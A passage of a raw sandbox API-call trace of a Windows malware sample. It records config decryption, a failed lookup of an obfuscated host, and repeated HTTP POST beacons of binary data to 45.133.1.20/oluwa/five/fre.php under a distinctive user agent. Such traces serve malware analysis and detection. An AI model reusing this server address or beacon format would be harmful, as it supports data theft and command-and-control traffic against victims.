dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1724) returned 0x998 [0271.867] Sleep (dwMilliseconds=0xea60) [0271.869] GetProcessHeap () returned 0x6a0000 [0271.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0271.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0271.927] GetProcessHeap () returned 0x6a0000 [0271.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0271.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.928] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0271.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.929] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.935] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.935] GetProcessHeap () returned 0x6a0000 [0271.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0271.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.937] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0271.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.938] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0271.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.939] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0271.939] GetProcessHeap () returned 0x6a0000 [0271.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0271.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.943] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.944] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.945] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.946] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.946] GetProcessHeap () returned 0x6a0000 [0271.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0271.946] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0271.946] GetProcessHeap () returned 0x6a0000 [0271.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0271.947] GetProcessHeap () returned 0x6a0000 [0271.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0271.947] GetProcessHeap () returned 0x6a0000 [0271.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0271.947] GetProcessHeap () returned 0x6a0000 [0271.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0271.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.948] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0271.960] GetProcessHeap () returned 0x6a0000 [0271.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0271.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.961] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0271.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.965] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.966] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.966] GetProcessHeap () returned 0x6a0000 [0271.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0271.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.969] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0271.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.970] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0271.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.972] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0271.972] GetProcessHeap () returned 0x6a0000 [0271.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0271.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.977] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0271.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.978] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0271.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.979] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0271.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.980] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0271.980] GetProcessHeap () returned 0x6a0000 [0271.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0271.980] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0271.980] GetProcessHeap () returned 0x6a0000 [0271.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0271.980] socket (af=2, type=1, protocol=6) returned 0x99c [0271.980] connect (s=0x99c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0272.008] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0272.008] GetProcessHeap () returned 0x6a0000 [0272.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0272.008] GetProcessHeap () returned 0x6a0000 [0272.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0272.009] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0272.010] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0272.010] GetProcessHeap () returned 0x6a0000 [0272.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9e70 [0272.010] GetProcessHeap () returned 0x6a0000 [0272.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0272.011] GetProcessHeap () returned 0x6a0000 [0272.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0272.011] GetProcessHeap () returned 0x6a0000 [0272.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0272.012] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0272.013] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0272.013] GetProcessHeap () returned 0x6a0000 [0272.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0272.013] GetProcessHeap () returned 0x6a0000 [0272.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0272.013] send (s=0x99c, buf=0x6bd460*, len=242, flags=0) returned 242 [0272.014] send (s=0x99c, buf=0x6bb998*, len=159, flags=0) returned 159 [0272.014] GetProcessHeap () returned 0x6a0000 [0272.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0272.014] recv (in: s=0x99c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0272.096] GetProcessHeap () returned 0x6a0000 [0272.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0272.097] GetProcessHeap () returned 0x6a0000 [0272.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0272.098] GetProcessHeap () returned 0x6a0000 [0272.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9e70 | out: hHeap=0x6a0000) returned 1 [0272.098] GetProcessHeap () returned 0x6a0000 [0272.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0272.098] closesocket (s=0x99c) returned 0 [0272.099] GetProcessHeap () returned 0x6a0000 [0272.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0272.099] GetProcessHeap () returned 0x6a0000 [0272.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0272.099] GetProcessHeap () returned 0x6a0000 [0272.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0272.100] GetProcessHeap () returned 0x6a0000 [0272.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0272.100] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x172c) returned 0x99c [0272.102] Sleep (dwMilliseconds=0xea60) [0272.104] GetProcessHeap () returned 0x6a0000 [0272.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0272.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.106] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.114] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0272.120] GetProcessHeap () returned 0x6a0000 [0272.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0272.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.122] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0272.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.123] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.123] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.123] GetProcessHeap () returned 0x6a0000 [0272.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0272.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.125] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0272.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.126] CryptDestroyKey (hKey=0x6ad020) returned 1 [0272.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.130] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0272.130] GetProcessHeap () returned 0x6a0000 [0272.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0272.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.134] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.135] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.137] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.184] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.184] GetProcessHeap () returned 0x6a0000 [0272.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0272.184] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0272.185] GetProcessHeap () returned 0x6a0000 [0272.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0272.185] GetProcessHeap () returned 0x6a0000 [0272.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0272.186] GetProcessHeap () returned 0x6a0000 [0272.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0272.186] GetProcessHeap () returned 0x6a0000 [0272.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0272.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.187] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0272.204] GetProcessHeap () returned 0x6a0000 [0272.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0272.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.205] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0272.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.206] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.207] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.207] GetProcessHeap () returned 0x6a0000 [0272.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0272.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.208] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0272.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.209] CryptDestroyKey (hKey=0x6ad020) returned 1 [0272.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.210] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0272.210] GetProcessHeap () returned 0x6a0000 [0272.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0272.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.211] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0272.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.212] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0272.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.213] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0272.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.214] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0272.214] GetProcessHeap () returned 0x6a0000 [0272.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0272.214] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0272.214] GetProcessHeap () returned 0x6a0000 [0272.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0272.214] socket (af=2, type=1, protocol=6) returned 0x9a0 [0272.215] connect (s=0x9a0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0272.242] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0272.243] GetProcessHeap () returned 0x6a0000 [0272.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0272.243] GetProcessHeap () returned 0x6a0000 [0272.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0272.244] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0272.245] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0272.245] GetProcessHeap () returned 0x6a0000 [0272.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9930 [0272.245] GetProcessHeap () returned 0x6a0000 [0272.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0272.247] GetProcessHeap () returned 0x6a0000 [0272.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0272.247] GetProcessHeap () returned 0x6a0000 [0272.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0272.248] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0272.249] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0272.249] GetProcessHeap () returned 0x6a0000 [0272.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0272.249] GetProcessHeap () returned 0x6a0000 [0272.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0272.250] send (s=0x9a0, buf=0x6bd460*, len=242, flags=0) returned 242 [0272.250] send (s=0x9a0, buf=0x6bb998*, len=159, flags=0) returned 159 [0272.250] GetProcessHeap () returned 0x6a0000 [0272.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0272.250] recv (in: s=0x9a0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0272.330] GetProcessHeap () returned 0x6a0000 [0272.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0272.330] GetProcessHeap () returned 0x6a0000 [0272.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0272.331] GetProcessHeap () returned 0x6a0000 [0272.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9930 | out: hHeap=0x6a0000) returned 1 [0272.331] GetProcessHeap () returned 0x6a0000 [0272.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0272.332] closesocket (s=0x9a0) returned 0 [0272.333] GetProcessHeap () returned 0x6a0000 [0272.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0272.333] GetProcessHeap () returned 0x6a0000 [0272.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0272.334] GetProcessHeap () returned 0x6a0000 [0272.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0272.334] GetProcessHeap () returned 0x6a0000 [0272.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0272.335] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1730) returned 0x9a0 [0272.337] Sleep (dwMilliseconds=0xea60) [0272.338] GetProcessHeap () returned 0x6a0000 [0272.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0272.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.340] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.357] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0272.366] GetProcessHeap () returned 0x6a0000 [0272.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 